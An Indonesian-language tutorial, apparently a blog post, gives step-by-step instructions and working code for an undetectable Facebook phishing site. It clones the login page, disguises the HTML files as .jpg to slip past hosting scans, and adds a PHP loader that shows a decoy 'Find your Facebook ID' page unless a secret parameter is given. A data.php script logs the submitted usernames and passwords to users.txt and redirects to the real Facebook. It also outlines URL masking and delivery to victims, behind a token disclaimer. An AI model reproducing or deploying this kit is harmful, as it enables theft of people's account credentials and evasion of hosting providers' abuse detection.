Buat terdeteksi Facebook Phishing Site
Oleh
chmood
Cara membuat halaman facebook phishing tidak terdeteksi !, ini adalah topik besar dalam sekarang hari dan saya mendapat banyak pertanyaan tentang topik ini, jadi hari ini saya ingin menunjukkan solusi untuk ini.
dalam tutorial ini saya akan menjelaskan seluruh proses untuk membuat halaman phishing tidak terdeteksi termasuk cara untuk memotong pemeriksaan keamanan situs hosting gratis untuk menghindari suspensi akun, URL masking / bersembunyi, dan bagaimana untuk mengirimkannya ke korban.
Dalam skenario normal ketika Anda merancang halaman phishing dan meng-upload file ke account hosting Anda, penyedia Web Hosting Anda mencoba untuk menemukan semua upaya phishing dari server mereka, waktu maksimum mereka melakukan hal ini dengan menggunakan crawler otomatis. Jika crawler menemukan karakter Terlarang dalam file yang Anda upload. Kadang-kadang mereka dapat menghubungi Anda secara langsung untuk menghapus file phishing.
Jika mereka menerima pemberitahuan, mereka akan menghapus file secara otomatis dan memberitahu Anda bahwa website Anda berisi file phishing dan dapat menangguhkan account Anda tapi di sini Anda memiliki solusi nyata untuk masalah ini.
Jika Anda pemula untuk facebook phishing maka saya sarankan Anda untuk membaca artikel saya sebelumnya: Cara Hack Facebook Menggunakan Phishing Metode-Dasar
Peringatan & Disclaimer: Membuat halaman phishing tidak ilegal, tetapi menggunakan halaman phishing adalah ilegal. Tutorial ini hanya untuk menunjukkan Anda, "Bagaimana membuat halaman phishing?". Jika Anda menggunakan ini untuk hack akun orang, maka AKU tidak bertanggung jawab untuk itu. Melakukan apa-apa pada risiko Anda sendiri.
Tutorial ini memiliki 3 langkah utama:
Membuat halaman phishing facebook tidak terdeteksi
Membuat akun di situs web hosting gratis dan upload file phisher
Url Masking / Menyembunyikan dan kirimkan ke korban
Jadi Mari yang Mulai,
Saya lebih suka pemula untuk mengikuti panduan langkah demi langkah, sehingga Anda dapat belajar bagaimana karya phishing. Jika Anda tidak ingin membuat sendiri sebuah halaman phishing maka Anda bisa Download attachment file di sini (facebookdesktop.zip) atau alternatif men-download dan beralih ke Langkah: 2
Sekarang teman-teman akan mendapatkan dua file (folder _FILES login dan login.html).
sekarang klik kanan pada 'login.html' dan terbuka dengan notepad dan pencarian (Dengan menekan Ctrl + F) untuk: tindakan di dalamnya dan mengganti bagian yang di highlight (seperti dalam screenshot berikut) dengan 'data.php'.
(ada 3 'metode' dan banyak 'tindakan' di file ketika Anda mencari, tetapi Anda harus mengganti metode pertama dan tindakan belakang
Lagi mencari (Dengan menekan Ctrl + F) untuk: metode di dalamnya dan mengganti bagian yang disorot (posting) dengan 'mendapatkan' dan simpan.
Mengubah nama 'login.html' ke 'login.jpg' (file jpg akan melewati hosting gratis pemeriksaan keamanan).
Sekarang kita harus membuat halaman web lain dengan ekstensi .jpg. saya sudah menyiapkan halaman sederhana sehingga salin kode di bawah dan paste di notepad dan simpan file sebagai 'follow.jpg’
<!DOCTYPE html><html> <head> <title>Find your Facebook ID - a 5-second easy tool for locating your Facebook numeric personal ID</title> <meta name="description" content="If you need to know your Facebook numeric peronal ID, just plug your Profile URL into this simple tool." /> <link rel="stylesheet" href="reset.css" type="text/css" media="screen"> <link rel="stylesheet" href="style.css" type="text/css" media="screen"> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script> <script src="script.js" type="text/javascript" charset="utf-8"></script> <meta property="fb:admins" content="1146295886" /> </head> <body> <form action="" method="post"> <label for="fb_profile_url" class="text-input-label fb_profile_url-text-input-label"> Enter your personal Facebook profile URL: </label> <input type="text" name="fb_profile_url" value="" class="nr-text" size="45" placeholder="http://www.facebook.com/YourProfileName" /> <input type="hidden" name="unsanitized" class="nr-hidden hidden-input-for-unsanitized" /> <p> <input type="submit" value="Lookup numeric ID..." class="button-primary"> </p> <h1>Easily find your Facebook numeric personal ID for fb:admins social plugins and more!</h1> <p id="description"> For integrations of certain Facebook social plugins, like the "Like" button and "Like box", and others, Facebook
requires that you know your Facebook numeric user ID. Unfortunately, they make this very difficult to find, especially
if you have a so-called "vanity" personalized profile URL. If you can't find your Facebook ID, or don't know what it is
and need it, just enter your full Facebook profile URL in the above form, and we can scrape the ID from the code of your
personal profile page.
</p></form>
<script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-3361652-13']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })();</script> </body></html>
Berikutnya Anda menyalin kode di bawah ini dan paste di notepad dan simpan sebagai 'index.php'.
<?php$id = $_GET["id"];if ($id == "facebookdesktop") { $myFile = "login.jpg"; $fh = fopen($myFile, 'r'); $theData = fread($fh, 500000); fclose($fh); echo $theData;}else{ $myFile1 = "follow.jpg"; $fh1 = fopen($myFile1, 'r'); $theData1 = fread($fh1, 500000); fclose($fh1); echo $theData1;}?>
Sekarang Anda harus membuat file php lain, untuk menyalin kode di bawah ini dan simpan sebagai 'data.php'.
:<?phpheader("Location: https://m.facebook.com/login.php?&e=1348092&email=");$handle = fopen("users.txt", "a");foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, "\r\n");}fwrite($handle, "\r\n");fclose($handle);exit;?>
Akhirnya kita harus membuat file txt untuk username dan password toko korban, sehingga membuat file txt kosong dan menyimpannya sebagai 'users.txt'.
Jika Anda mengikuti semua langkah di atas dengan hati-hati, Anda akan memiliki 6 file termasuk 1 folder dan Ini akan terlihat seperti ini:
Sekarang pilih semua file dan membuat pos itu (setiap nama dalam kasus saya itu adalah 'facebook desktop.zip'). Klik di sini untuk men-download lampiran
Catatan: pastikan semua 6 file berada di dalam file .zip
beralih ke Langkah: 2
Komentar